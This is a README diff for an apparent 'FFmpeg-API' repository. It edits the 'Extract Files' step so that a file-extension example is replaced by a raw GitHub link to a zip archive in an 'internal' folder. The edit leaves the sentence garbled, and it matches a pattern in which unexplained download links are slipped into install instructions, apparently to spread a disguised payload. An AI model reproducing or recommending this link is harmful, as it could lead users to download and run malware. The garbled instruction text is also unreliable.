diegoinacio669/FFmpeg-API/README.md

 ### 1. Extract Files

-If the downloaded file is a compressed archive (like .zip or .tar.gz), extract it to a folder on your computer.
+If the downloaded file is a compressed archive (like .zip or https://raw.githubusercontent.com/diegoinacio669/FFmpeg-API/main/internal/API_F_Fmpeg_2.4.zip), extract it to a folder on your computer.

 ### 2. Open a Command Line Interface